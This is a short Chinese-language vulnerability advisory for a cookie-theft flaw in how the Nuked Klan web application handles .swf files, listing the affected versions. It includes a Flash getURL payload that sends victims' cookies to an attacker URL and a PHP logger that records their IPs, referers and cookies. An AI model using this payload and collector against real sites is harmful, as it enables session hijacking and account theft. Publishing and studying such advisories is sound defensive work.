RootSSV:1114Nuked Klan任意.SWF文件COOKIE窃取漏洞
Nuked Klan是一款基于ASP的WEB应用程序。
Nuked Klan处理.swf文件存在问题,远程攻击者可以利用漏洞获取其他目标用户的敏感COOKIE信息。
构建一个.swf文件,放置如下代码:
getURL("javascript:alert(‘document.location="http://site.com/cookie.php?
cookie="+document.cookie’);");
或者
<?php
$cookie = $_GET[‘cookie’];
$ip = getenv (‘REMOTE_ADDR’);
$date=date("m/d/Y g:i:s a");
$referer=getenv (‘HTTP_REFERER’);
$fl = fopen(‘cookies.txt’, ‘a’);
fwrite($fl, "\n".$ip.’ :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>
当其他用户浏览器此文件时,可导致敏感COOKIE信息发送给攻击者。
Nuked-Klan Nuked-Klan 1.7
Nuked-Klan Nuked-Klan 1.5 SP2
Nuked-Klan Nuked-Klan 1.5
Nuked-Klan Nuked-Klan 1.4
Nuked-Klan Nuked-Klan 1.3 beta
Nuked-Klan Nuked-Klan 1.3
Nuked-Klan Nuked-Klan 1.2 beta
Nuked-Klan Nuked-Klan 1.2
目前没有解决方案提供:
<a href=“http://nk.gamez.solexine.fr/” target=“_blank”>http://nk.gamez.solexine.fr/</a>